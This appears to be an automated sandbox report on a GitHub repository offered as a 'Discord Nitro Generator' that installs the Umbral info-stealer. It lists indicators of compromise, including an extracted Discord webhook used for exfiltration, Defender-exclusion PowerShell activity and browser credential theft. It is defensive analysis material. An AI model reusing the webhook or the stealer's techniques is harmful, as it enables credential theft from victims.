umbral | hxxps://github[.]com/d1skq/Discord-Nitro-Generator

Analysis

max time kernel
94s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2025 04:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/d1skq/Discord-Nitro-Generator

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1326669089476706396/l-yx0lWXj8QbB9ihEvCHFp14wiJQQBpxmsTtuFf1EyjY71pAMqBEETcBWgs47CofK0Vv

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023d27-391.dat	family_umbral
behavioral1/memory/4496-448-0x0000019D5E4B0000-0x0000019D5E4F0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4584	powershell.exe
2044	powershell.exe
4112	powershell.exe
4584	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4496	lastloader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
146	discord.com
147	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
143	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3512	cmd.exe
4704	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4136	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 82003100000000002f5a79801000444953434f527e3100006a0009000400efbe445a3322445a33222e000000e83a020000000c0000000000000000000000000000000000000044006900730063006f00720064002d004e006900740072006f002d00470065006e0065007200610074006f0072002d006d00610069006e00000018000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 200000001a00eebbfe23000010009bee837d4422704eb1f55393042af1e400000000	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\NodeSlot = "6"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = ffffffff	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4704	PING.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
3692	msedge.exe
3692	msedge.exe
3096	msedge.exe
3096	msedge.exe
3524	identity_helper.exe
3524	identity_helper.exe
1696	msedge.exe
1696	msedge.exe
3196	msedge.exe
3196	msedge.exe
2920	msedge.exe
2920	msedge.exe
4584	powershell.exe
4584	powershell.exe
4584	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe
4584	powershell.exe
4584	powershell.exe
4584	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3196	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2196	7zG.exe
Token: 35	2196	7zG.exe
Token: SeSecurityPrivilege	2196	7zG.exe
Token: SeSecurityPrivilege	2196	7zG.exe
Token: SeDebugPrivilege	4496	lastloader.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeIncreaseQuotaPrivilege	3392	wmic.exe
Token: SeSecurityPrivilege	3392	wmic.exe
Token: SeTakeOwnershipPrivilege	3392	wmic.exe
Token: SeLoadDriverPrivilege	3392	wmic.exe
Token: SeSystemProfilePrivilege	3392	wmic.exe
Token: SeSystemtimePrivilege	3392	wmic.exe
Token: SeProfSingleProcessPrivilege	3392	wmic.exe
Token: SeIncBasePriorityPrivilege	3392	wmic.exe
Token: SeCreatePagefilePrivilege	3392	wmic.exe
Token: SeBackupPrivilege	3392	wmic.exe
Token: SeRestorePrivilege	3392	wmic.exe
Token: SeShutdownPrivilege	3392	wmic.exe
Token: SeDebugPrivilege	3392	wmic.exe
Token: SeSystemEnvironmentPrivilege	3392	wmic.exe
Token: SeRemoteShutdownPrivilege	3392	wmic.exe
Token: SeUndockPrivilege	3392	wmic.exe
Token: SeManageVolumePrivilege	3392	wmic.exe
Token: 33	3392	wmic.exe
Token: 34	3392	wmic.exe
Token: 35	3392	wmic.exe
Token: 36	3392	wmic.exe
Token: SeIncreaseQuotaPrivilege	3392	wmic.exe
Token: SeSecurityPrivilege	3392	wmic.exe
Token: SeTakeOwnershipPrivilege	3392	wmic.exe
Token: SeLoadDriverPrivilege	3392	wmic.exe
Token: SeSystemProfilePrivilege	3392	wmic.exe
Token: SeSystemtimePrivilege	3392	wmic.exe
Token: SeProfSingleProcessPrivilege	3392	wmic.exe
Token: SeIncBasePriorityPrivilege	3392	wmic.exe
Token: SeCreatePagefilePrivilege	3392	wmic.exe
Token: SeBackupPrivilege	3392	wmic.exe
Token: SeRestorePrivilege	3392	wmic.exe
Token: SeShutdownPrivilege	3392	wmic.exe
Token: SeDebugPrivilege	3392	wmic.exe
Token: SeSystemEnvironmentPrivilege	3392	wmic.exe
Token: SeRemoteShutdownPrivilege	3392	wmic.exe
Token: SeUndockPrivilege	3392	wmic.exe
Token: SeManageVolumePrivilege	3392	wmic.exe
Token: 33	3392	wmic.exe
Token: 34	3392	wmic.exe
Token: 35	3392	wmic.exe
Token: 36	3392	wmic.exe
Token: SeIncreaseQuotaPrivilege	312	wmic.exe
Token: SeSecurityPrivilege	312	wmic.exe
Token: SeTakeOwnershipPrivilege	312	wmic.exe
Token: SeLoadDriverPrivilege	312	wmic.exe
Token: SeSystemProfilePrivilege	312	wmic.exe
Token: SeSystemtimePrivilege	312	wmic.exe
Token: SeProfSingleProcessPrivilege	312	wmic.exe
Token: SeIncBasePriorityPrivilege	312	wmic.exe
Token: SeCreatePagefilePrivilege	312	wmic.exe
Token: SeBackupPrivilege	312	wmic.exe
Token: SeRestorePrivilege	312	wmic.exe
Token: SeShutdownPrivilege	312	wmic.exe
Token: SeDebugPrivilege	312	wmic.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
2196	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe
3096	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3196	msedge.exe
3196	msedge.exe
3196	msedge.exe
3196	msedge.exe
3196	msedge.exe
2920	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 4400	3096	msedge.exe	83
PID 3096 wrote to memory of 4400	3096	msedge.exe	83
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3844	3096	msedge.exe	84
PID 3096 wrote to memory of 3692	3096	msedge.exe	85
PID 3096 wrote to memory of 3692	3096	msedge.exe	85
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86
PID 3096 wrote to memory of 4928	3096	msedge.exe	86

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3156	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/d1skq/Discord-Nitro-Generator
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff85c8546f8,0x7ff85c854708,0x7ff85c854718
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
